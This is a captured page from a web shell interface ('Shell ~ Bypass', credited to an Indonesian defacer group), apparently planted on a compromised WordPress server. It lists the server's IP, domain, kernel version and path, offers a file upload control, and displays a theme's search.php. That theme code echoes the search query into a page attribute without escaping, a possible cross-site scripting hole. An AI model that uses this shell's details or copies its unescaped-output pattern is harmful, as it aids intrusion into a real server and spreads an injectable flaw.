Shell ~ Bypass
[+] Kelelawar Cyber Team [+]
:
216.73.216.123
:
104.131.203.165 / webuikits.com
:
Linux Webuikits 3.13.0-57-generic #95-Ubuntu SMP Fri Jun 19 09:28:15 UTC 2015 x86_64
:
/
Users
/
wp-content
/
themes
/
collection
/
Upload File:
files >> //Users/wp-content/themes/collection/search.php
<?php get_header(); ?> <div id="primary" class="hfeed"> <div id="masonry"> <?php $post_count = 0; $empty = 'data-empty="'.__('No more posts available.', 'themejunkie').'" '; $src = 'data-src="'.get_template_directory_uri().'/includes/get-posts.php" '; $offset = 'data-offset="'.get_option('posts_per_page').'" '; $catQ = 0; $cat = ''; if(is_category()) $catQ = get_query_var('cat'); $cat = 'data-category="'.$catQ.'" '; $authorQ = 0; $author = ''; if(is_author()) $authorQ = get_query_var('author'); $author = 'data-author="'.$authorQ.'" '; $tagQ = ''; $tag = ''; if(is_tag()) $tagQ = get_query_var('tag'); $tag = 'data-tag="'.$tagQ.'" '; $dateQ = ''; $date = ''; if(is_archive()) $dateQ = get_query_var('monthnum'); $date = 'data-date="'.$dateQ.'" '; $searchQ = ''; $search = ''; if(is_search()) $searchQ = get_query_var('s'); $search = 'data-search="'.$searchQ.'" '; // The Query $the_query = new WP_Query( array( 'posts_per_page' => -1, 'cat' => $catQ, 'author' => $authorQ, 'tag' => $tagQ, 'monthnum' => $dateQ, 's' => $searchQ ) ); // The Loop while ( $the_query->have_posts() ) : $the_query->the_post(); $post_count++; endwhile; // Reset Post Data wp_reset_postdata(); $post_count = $post_count - get_option('posts_per_page'); if($post_count <= 0) $post_count = 0; ?> <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <?php // The following determines what the post format is and shows the correct file accordingly $format = get_post_format(); get_template_part( 'includes/formats/'.$format ); if($format == '') get_template_part( 'includes/formats/standard' ); ?> <?php endwhile; ?> </div><!-- #masonry--> <?php else : ?> <h1 class="entry-title"><?php _e('Not Found', 'themejunkie'); ?></h1> <p><?php _e('Sorry, but you are looking for something that is not here.', 'themejunkie'); ?></p> <?php endif; ?> <div class="ready" id="new-posts"></div> </div><!-- #primary .hfeed --> <div id="load-more-link"> <span id="load-more-ico"></span> <a name="<?php echo get_template_directory_uri();?>" <?php echo $empty; echo $src; echo $offset; echo $cat; echo $author; echo $tag; echo $date; echo $search ?>href="#loadMore"> <?php _e('Load more...', 'themejunkie'); ?> <span> <span data-num="<?php echo get_option('posts_per_page');?>" data-src="<?php echo get_template_directory_uri(); ?>/images/ajax-loader.gif" id="post-count"> <?php echo $post_count; ?> </span> <span data-text="<?php _e('Remaining', 'themejunkie'); ?>" id="remaining"><?php _e('Remaining', 'themejunkie'); ?></span> </span> </a> <?php get_footer(); ?> </div><!-- #load-more-link -->
Copyright ©2021 || Defacer Indonesia